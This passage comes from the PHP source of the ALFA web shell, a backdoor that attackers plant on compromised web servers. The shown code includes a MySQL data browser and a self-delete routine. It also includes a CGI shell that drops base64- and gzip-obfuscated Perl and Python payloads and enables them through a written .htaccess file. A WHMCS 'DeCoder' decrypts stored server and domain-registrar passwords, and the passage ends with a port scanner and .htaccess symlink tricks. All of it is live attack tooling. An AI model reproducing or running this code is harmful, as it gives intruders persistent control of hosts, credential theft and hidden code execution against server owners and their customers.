$query);\r\n\t\t\techo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));\r\n\t\t}else{\r\n\t\t\t$pages = 0;\r\n\t\t\t$title = false;\r\n\t\t\t$query = "";\r\n\t\t\t$tbl_content = \'<table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">\';\r\n\t\t\t$line = 0;\r\n\t\t\t$tables = array();\r\n\t\t\t$columns = array();\r\n\t\t\tif($type == "load_data"){\r\n\t\t\t\t$query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT 0,30";\r\n\t\t\t\t$tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `".$db["db"]."`.`".$db["table"]."`");\r\n\t\t\t\t$tbl_count = @mysqli_fetch_row($tbl_count_q);\r\n\t\t\t\t$columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = \'".$db["db"]."\' AND `TABLE_NAME` = \'".$db["table"]."\'");\r\n\t\t\t\twhile($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){\r\n\t\t\t\t\t$columns[] = $row2;\r\n\t\t\t\t}\r\n\t\t\t\tif($tbl_count[0] > 30){\r\n\t\t\t\t\t$pages = ceil($tbl_count[0] / 30);\r\n\t\t\t\t}\r\n\t\t\t}elseif($type == "query"){\r\n\t\t\t\t$query = $db["query"];\r\n\t\t\t}elseif($type == "page"){\r\n\t\t\t\t$db["page"] = (int)$db["page"] - 1;\r\n\t\t\t\t$query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT ".($db["page"]*30).",30";\r\n\t\t\t}elseif($type == "search"){\r\n\t\t\t\t$search = "";\r\n\t\t\t\t$search_noval = array("= \'\'", "!= \'\'", "IS NULL", "IS NOT NULL");\r\n\t\t\t\tforeach($db["search"] as $col => $val){\r\n\t\t\t\t\t$search_noval_r = in_array($val["opt"], $search_noval);\r\n\t\t\t\t\tif(empty($val["value"]) && !$search_noval_r)continue;\r\n\t\t\t\t\tif(strstr($val["opt"], "...") || $search_noval_r){\r\n\t\t\t\t\t\t$val["opt"] = str_replace("...", $val["value"], $val["opt"]);\r\n\t\t\t\t\t\t$search .= $col . " " . $val["opt"] . " AND ";\r\n\t\t\t\t\t}else{\r\n\t\t\t\t\t\t$search .= $col . " " . $val["opt"] . " \'".addslashes($val["value"])."\' AND ";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\t$search .= "1=1";\r\n\t\t\t\t$query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE " . $search;\r\n\t\t\t}\r\n\t\t\t$q_tables = @mysqli_query($conn, $query);\r\n\t\t\tif(!$q_tables){\r\n\t\t\t\techo @json_encode(array("status" => false, "error" => @mysqli_error($conn), "query" => $query));\r\n\t\t\t\treturn false;\r\n\t\t\t}\r\n\t\t\t$col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = \'".@addslashes($db["db"])."\' AND TABLE_NAME = \'".@addslashes($db["table"])."\' AND COLUMN_KEY = \'PRI\'");\r\n\t\t\tif($col_key){\r\n\t\t\t\t$col_key = @mysqli_fetch_row($col_key);\r\n\t\t\t\t$col_key = $col_key[0];\r\n\t\t\t\tif(!empty($col_key)){\r\n\t\t\t\t\t$tbl_content = \'<div style="margin-bottom:5px;margin-top:5px;"><button col_key="\'.$col_key.\'" tbl_name="\'.$db["table"].\'" db_id="\'.$db["db_id"].\'" \tdb_target="\'.$db["db"].\'" onclick="alfaMysqlDeleteAllSelectedrows(this);return false;">Delete Selected Rows</button></div><table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">\';\r\n\t\t\t\t}\r\n\t\t\t}else{\r\n\t\t\t\t$col_key = false;\r\n\t\t\t}\r\n\t\t\twhile($item = @mysqli_fetch_assoc($q_tables)){\r\n\t\t\t\tif(!$title){\r\n\t\t\t\t\t$tbl_content .= \'<tr style="background-color:#305b8e;">\';\r\n\t\t\t\t\tif($col_key){\r\n\t\t\t\t\t\t$tbl_content .= \'<th style="width: 55px;text-align:center;"><input db_id="\'.$db["db_id"].\'" onchange="alfaMysqlTblSelectAll(this);" type="checkbox"></th><th style="width: 55px;text-align:center;">Edit</th><th style="width: 55px;text-align:center;">Delete</th>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($item as $key => $value){\r\n\t\t\t\t\t\t$tbl_content .= \'<th>\'.$key.\'</th>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\treset($item);\r\n\t\t\t\t\t$title=true;\r\n\t\t\t\t\t$tbl_content .= \'</tr><tr>\';\r\n\t\t\t\t}\r\n\r\n\t\t\t\tif($col_key){\r\n\t\t\t\t\t$cacheMsg = \'<td style="text-align:center;"><input row_id="\'.$line.\'" type="checkbox" name="tbl_rows_checkbox[]" value="\'.$item[$col_key].\'"></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="\'.$db["db_id"].\'" db_target="\'.$db["db"].\'" tbl_name="\'.$db["table"].\'" col_key="\'.$col_key.\'" key="\'.$item[$col_key].\'" onclick="alfaMysqlEditRow(this, \\\'edit\\\');" style="color:#0acaa6;">Edit</a></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="\'.$db["db_id"].\'" db_target="\'.$db["db"].\'" tbl_name="\'.$db["table"].\'" col_key="\'.$col_key.\'" key="\'.$item[$col_key].\'" row_id="\'.$line.\'" onclick="alfaMysqlEditRow(this, \\\'delete\\\');" style="color:#ff1e1e;">Delete</a></td>\';\r\n\t\t\t\t}\r\n\t\t\t\t$tbl_content .= \'<tr class="tbl_row tbl_row_l\'.$line.\'">\'.$cacheMsg;\r\n\t\t\t\t$line++;\r\n\t\t\t\tforeach($item as $key => $value){\r\n\t\t\t\t\tif($value == null){\r\n\t\t\t\t\t\t$tbl_content .= \'<td><i>null</i></td>\';\r\n\t\t\t\t\t}else{\r\n\t\t\t\t\t\t$tbl_content .= \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\t$tbl_content .= \'</tr>\';\r\n\t\t\t}\r\n\t\t\t$tbl_content .= \'</table>\';\r\n\t\t\tif(!$title){\r\n\t\t\t\t$tbl_content = "<div style=\'padding:5px;border:1px dashed;margin:10px;\'>Table is empty...</div>";\r\n\t\t\t}\r\n\t\t\techo @json_encode(array("status" => true, "table" => $tbl_content, "columns" => $columns, "pages" => $pages, "query" => $query));\r\n\t\t}\r\n\t\t@mysqli_close($conn);\r\n\t}\r\n}\r\nfunction alfaselfrm(){\r\nif(isset($_POST[\'alfa1\'])&&$_POST[\'alfa1\']==\'yes\'){\r\necho(__pre().\'<center>\');\r\nif(@unlink($GLOBALS[\'__file_path\'])){\r\necho(\'<b>Shell has been removed</i> :)</b>\');\r\n}else{\r\necho \'unlink error!\';\r\n}\r\necho(\'</center>\');\r\n}\r\nif(isset($_POST[\'alfa1\'])&&$_POST[\'alfa1\']!=\'yes\'){\r\necho "<div class=header>";\r\necho "\r\n<center><p><img src=\\"http://solevisible.com/images/farvahar-iran.png\\"></p>";\r\necho \'<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\\\'selfrm\\\',null,\\\'yes\\\');"> Yes</a>\';\r\necho \'</p></center></div>\';\r\n}\r\n}\r\nfunction alfacgishell(){\r\nalfahead();\r\n$div = "";\r\nalfaCreateParentFolder();\r\n@chdir($GLOBALS[\'home_cwd\'] . "/" . __ALFA_DATA_FOLDER__);\r\nif(!in_array($_POST[\'alfa1\'],array(\'perl\',\'py\'))){\r\n$div = "</div>";\r\necho \'<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a class="rejectme" href="javascript:void(0)" onclick="runcgi(\\\'perl\\\')">| Perl | </a><a class="rejectme" href="javascript:void(0)" onclick="runcgi(\\\'py\\\');">| Python | </a>\';\r\n}\r\nif(isset($_POST[\'alfa1\'])&&in_array($_POST[\'alfa1\'],array(\'perl\',\'py\'))){\r\n@mkdir(\'cgialfa\',0755);\r\n@chdir(\'cgialfa\');\r\nalfacgihtaccess(\'cgi\');\r\n$name = $_POST[\'alfa1\'].\'.alfa\';\r\n$perl = \'#!/usr/bin/perl   -I/usr/local/bandmin\'."\\n".\'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));\';;\r\n$py = \'#!/usr/bin/python\'."\\nimport zlib, base64\\n".\'eval(compile(zlib.decompress(base64.b64decode("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")),\\\'<string>\\\',\\\'exec\\\'))\';\r\nif($_POST[\'alfa1\']==\'perl\'){$code = $perl;}else{$code = $py;}\r\nif(__write_file($name,$code)){\r\n@chmod($name,0755);\r\necho \'<iframe src="\'.__ALFA_DATA_FOLDER__.\'/cgialfa/\'.$name.\'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>\';\r\n}\r\n}\r\necho $div;\r\nalfafooter();\r\n}\r\nfunction alfaWhmcs(){\r\nalfahead();\r\necho \'<div class=header>\';\r\nfunction decrypt($string,$cc_encryption_hash){\r\n$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);\r\n$hash_key = _hash($key);\r\n$hash_length = strlen ($hash_key);\r\n$string = __ZGVjb2Rlcg($string);\r\n$tmp_iv = substr ($string, 0, $hash_length);\r\n$string = substr ($string, $hash_length, strlen ($string) - $hash_length);\r\n$iv = $out = \'\';\r\n$c = 0;\r\nwhile ($c < $hash_length)\r\n{\r\n$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));\r\n++$c;\r\n}\r\n$key = $iv;\r\n$c = 0;\r\nwhile ($c < strlen ($string))\r\n{\r\nif (($c != 0 AND $c % $hash_length == 0))\r\n{\r\n$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));\r\n}\r\n$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));\r\n++$c;\r\n}\r\nreturn $out;\r\n}\r\nfunction _hash($string)\r\n{\r\nif(function_exists(\'sha1\'))\r\n{\r\n$hash = sha1 ($string);\r\n}\r\nelse\r\n{\r\n$hash = md5 ($string);\r\n}\r\n$out = \'\';\r\n$c = 0;\r\nwhile ($c < strlen ($hash))\r\n{\r\n$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));\r\n$c += 2;\r\n}\r\nreturn $out;\r\n}\r\nAlfaNum(8,9,10);\r\necho "<center><br><div class=\'txtfont_header\'>| WHMCS DeCoder |</div><p>".getConfigHtml(\'whmcs\')."</p><form onsubmit=\\"g(\'Whmcs\',null,this.form_action.value,\'decoder\',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\\">\r\n<input type=\'hidden\' name=\'form_action\' value=\'2\'>";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_host : \', \'inputName\' => \'db_host\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_username : \', \'inputName\' => \'db_username\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_password : \', \'inputName\' => \'db_password\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_name : \', \'inputName\' => \'db_name\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'cc_encryption_hash : \', \'inputName\' => \'cc_encryption_hash\', \'id\' => \'cc_encryption_hash\', \'inputValue\' => \'\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho "<p><input type=\'submit\' value=\' \' name=\'Submit\'></p></form></center>";\r\nif($_POST[\'alfa5\']!=\'\'){\r\n$db_host=($_POST[\'alfa7\']);\r\n$db_username=($_POST[\'alfa3\']);\r\n$db_password=($_POST[\'alfa4\']);\r\n$db_name=($_POST[\'alfa5\']);\r\n$cc_encryption_hash=($_POST[\'alfa6\']);\r\necho __pre();\r\n$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));\r\n$query = mysqli_query($conn,"SELECT * FROM tblservers");\r\n$num = mysqli_num_rows($query);\r\nif ($num > 0){\r\nfor($i=0; $i <=$num-1; $i++){\r\n$v = @mysqli_fetch_array($query);\r\n$ipaddress = $v[\'ipaddress\'];\r\n$username = $v[\'username\'];\r\n$type = $v[\'type\'];\r\n$active = $v[\'active\'];\r\n$hostname = $v[\'hostname\'];\r\necho("<center><table border=\'1\'>");\r\n$password = decrypt ($v[\'password\'], $cc_encryption_hash);\r\necho("<tr><td><b><font color=\\"#FFFFFF\\">Type</font></td><td>$type</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#FFFFFF\\">Active</font></td><td>$active</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#FFFFFF\\">Hostname</font></td><td>$hostname</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#FFFFFF\\">Ip</font></td><td>$ipaddress</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#FFFFFF\\">Username</font></td><td>$username</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#FFFFFF\\">Password</font></td><td>$password</td></tr></b>");\r\necho "</table><br><br></center>";\r\n}\r\n$query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");\r\n$num1 = @mysqli_num_rows($query1);\r\nif ($num1 > 0){\r\nfor($i=0; $i <=$num1 -1; $i++){\r\n$v = mysqli_fetch_array($query1);\r\n$registrar = $v[\'registrar\'];\r\n$setting = $v[\'setting\'];\r\n$value = decrypt($v[\'value\'], $cc_encryption_hash);\r\nif ($value==""){\r\n$value=0;\r\n}\r\necho("<center>Domain Reseller <br><center>");\r\necho("<center><table border=\'1\'>");\r\necho("<tr><td><b><font color=\\"#67ABDF\\">Register</font></td><td>$registrar</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#67ABDF\\">Setting</font></td><td>$setting</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#67ABDF\\">Value</font></td><td>$value</td></tr></b>");\r\necho "</table><br><br></center>";\r\n}\r\n}\r\n}else{__alert(\'<font color="red">tblservers is Empty...!</font>\');};\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfaportscanner(){\r\nalfahead();\r\necho \'<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>\r\n<form action="" method="post" onsubmit="g(\\\'portscanner\\\',null,null,this.start.value,this.end.value,this.host.value); return false;">\r\n<input type="hidden" name="y" value="phptools">\r\n<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>\r\n<div class="txtfont">Port start: </div> <input id="text" size="5" type="text"  name="start" value="80"/>\r\n<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />\r\n</form></center><br>\';\r\n$start = strip_tags($_POST[\'alfa2\']);\r\n$end = strip_tags($_POST[\'alfa3\']);\r\n$host = strip_tags($_POST[\'alfa4\']);\r\nif(isset($_POST[\'alfa4\']) && is_numeric($_POST[\'alfa3\']) && is_numeric($_POST[\'alfa2\'])){\r\necho __pre();\r\n$packetContent = "GET / HTTP/1.1\\r\\n\\r\\n";\r\nif(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);\r\nelse{\r\n$packetContent = str_replace(array("\\r","\\n"), "", $packetContent);\r\n$packetContent = str_replace(array("\\\\r","\\\\n"), array("\\r", "\\n"), $packetContent);\r\n}\r\nfor($i = $start; $i<=$end; $i++){\r\n$sock = @fsockopen($host, $i, $errno, $errstr, 3);\r\nif($sock){\r\nstream_set_timeout($sock, 5);\r\nfwrite($sock, $packetContent."\\r\\n\\r\\n\\x00");\r\n$counter = 0;\r\n$maxtry = 1;\r\n$bin = "";\r\ndo{\r\n$line = fgets($sock, 1024);\r\nif(trim($line)=="")$counter++;\r\n$bin .= $line;\r\n}while($counter<$maxtry);\r\nfclose($sock);\r\necho "<center><p>Port <font style=\'color:#DE3E3E\'>$i</font> is open</p>";\r\necho "<p><textarea style=\'height:140px;width:50%;\'>".$bin."</textarea></p></center>";\r\n}\r\nflush();\r\n}\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfacgihtaccess($m,$d=\'\', $symname=false){\r\n$readme = "";\r\nif($symname){$readme="\\nReadmeName ".trim($symname);}\r\nif($m==\'cgi\'){\r\n$code = "#Coded By Sole Sad & Invisible\\nOptions FollowSymLinks MultiViews Indexes ExecCGI\\nAddType application/x-httpd-cgi .alfa\\nAddHandler cgi-script .alfa";\r\n}elseif($m==\'sym\'){\r\n$code = "#Coded By Sole Sad & Invisible\\nOptions Indexes FollowSymLinks\\nDirectoryIndex solevisible.phtm\\nAddType text/plain php html php4 phtml\\nAddHandler text/plain php html php4 phtml{$readme}\\nOptions all";\r\n}elseif($m==\'shtml\'){\r\n$code = "Options +Includes\\nAddType text/html .shtml\\nAddHandler server-parsed .shtml";\r\n}\r\n@__write_file($d . ".htaccess", $code);\r\n}\r\nfunction 